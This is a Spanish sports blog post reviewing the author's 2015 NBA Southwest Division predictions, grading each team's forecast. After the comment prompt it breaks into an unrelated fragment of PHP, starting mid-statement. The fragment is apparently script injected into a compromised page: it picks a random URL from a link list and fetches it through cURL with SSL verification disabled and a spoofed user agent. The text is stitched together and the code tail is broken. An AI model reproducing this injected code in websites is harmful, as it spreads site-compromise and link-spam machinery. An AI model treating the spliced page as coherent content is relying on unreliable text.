Revisando los pronósticos 2015: SouthWest

29 de March de 2015 por TheDeerHunter

Continuamos recuperando las previas que hicimos de cada franquicia antes del inicio de la temporada en curso. Turno de la División de la Muerte, la temible y siempre imprevisible SouthWest.

MEMPHIS GRIZZLIES

Pronóstico Octubre 2014: “Se moverán en torno al 50% de victorias pero va a ser difícil que les veamos este año en postemporada”.

Probabilidad de acierto: Remota.

Calificación pronóstico: F

No cabe duda de que los Grizzlies han sabido jugar sus cartas para liderar de forma inesperada la “división de la muerte” este curso en la NBA. Seguimos pensando que no partían con los mejores mimbres para mirar de tú a tú con otros trasatlánticos del oeste pero Joerger ha sabido llevar al extremo los tradicionales valores combativos de los “Osos” convirtiendose en el equipo hueso por antonomasia. Se han topado con el mejor baloncesto de sus carreras de Marc y Conley junto al fichaje de Jeff Green a mitad de curso, cubriendo así uno de los pocos puntos flacos que podían mostrar. Cualquier rival que se tope con ellos en los cruces sabe que va a tener que arremangarse y meterse hasta el cuello en el barro que los Grizzlies a buen seguro prepararán como campo de batalla. Ellos saben muy bien llevar el juego a su terreno y una vez allí no será fácil para nadie doblegarles.

HOUSTON ROCKETS

Pronóstico Octubre 2014: “Como ya hemos dicho, 50 victorias y primera ronda”.

Probabilidad de acierto: Baja.

Calificación pronóstico: D

Uno de los peores errores que se podía cometer este curso era poner en duda el liderato de James Harden, ahora mismo el favorito en las quinielas por el MVP. En ausencia de Howard durante la mayor parte de la temporada, es “La Barba” quien se ha echado a la espalda un equipo que, por nombres, dejaba mucho que desear en comparación con sus competidores directos. Posteriormente le han llegado refuerzos de la talla de Josh Smith y Corey Brewer, pero es incuestionable que el juego de Harden ha experimentado un salto cualitativo en carácter, eficacia y actitud defensiva. A falta de confirmar las notables sensaciones en Playoffs, parece que el puesto de McHale no corre peligro tras moverse con cierta comodidad por la parte alta del cuadro y desplegar uno de los juegos más vistosos de toda la competición.

SAN ANTONIO SPURS

Pronóstico Octubre 2014: “Sobre las 55 victorias. Entre los tres primeros del oeste”.

Probabilidad de acierto: Media.

Calificación pronóstico: C-

Esta temporada no está resultando ningún paseo en barca para los vigentes campeones. Imagino que hasta para “Sus Excelencias” sería de ilusos esperar una plácida regular en una conferencia tan compleja como es el Oeste. El nivel general de sus rivales, así como algún que otro contratiempo, les ha impedido encontrar el punto ideal que alcanzaron el año pasado. Popovich está teniendo que renunciar a algunos de esos descansos que tan bien le sientan a su veterana plantilla para clasificar a su equipo en la parte alta del cuadro. En cualquier caso, una vez en postemporada, ellos son el rival a batir mientras no se demuestre lo contrario y deberían ser favoritos en cualquier cruce.

DALLAS MAVERICKS

Pronóstico Octubre 2014: “De 53 victorias para arriba, cabeza de serie y como mínimo final de conferencia… pero si hay que mojarse, lo que me gustaría es verlos campeones”.

Probabilidad de acierto: Media-baja

Calificación pronóstico: D

La notable campaña de los Mavs con una proyección de victorias muy aproximada a la que dimos no les concede a los Mavs excesivas alegrías clasificatorias. El plantillón que les ha quedado con alguno de los fichajes más potentes que nadie ha hecho este año no termina de carburar del todo, especialmente en defensa, donde se encuentran en el tercio inferior de toda la liga. No parecen en condiciones de remontar hasta plaza de cabeza de serie y así será difícil alcanzar una hipotética final de conferencia con varias eliminatorias en desventaja campo por medio. Eso sí, que nadie dude de que tienen nivel para dar guerra a cualquier rival, así como genética de campeones.

NEW ORLEANS PELICANS

Pronóstico Octubre 2014: “Si se mantienen sanos, cosa realmente remota, no solos los sitúo en puestos de PO sino que considero que podrían ser la revelación de la liga en la regular y en las eliminatorias. Sin embargo, teniendo en cuenta el historial de lesiones de sus jugadores, les daremos unos PO y una primera ronda. Nada mal, por cierto.”

Probabilidad de acierto: Media-baja

Calificación pronóstico: C

Por si faltaba algo para que la Southwest sea un verdadero infierno, Anthony Davis y sus Pelicans han decidido intentar entrar en la pomada por los Playoffs este mismo año. Teniendo en cuenta las circunstancias y los rivales con quienes se están codeando, hay muy poco que reprocharles. Caso flagrante que al final volverá a hacernos lamentar el reparto de plazas de postemporada entre conferencia. En el Este probablemente estarían peleando por una primera ronda con ventaja de campo. Como no podía ser de otra manera, les ha tocado padecer la lesión de Holiday, uno de sus hombres clave, así como bajas de Ryan Anderson y Tyreke Evans en el peor momento posible. El desigual pulso contra los Thunder marcará la fecha de las vacaciones pero, termine como termine todo, la campaña es de mucho mérito.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>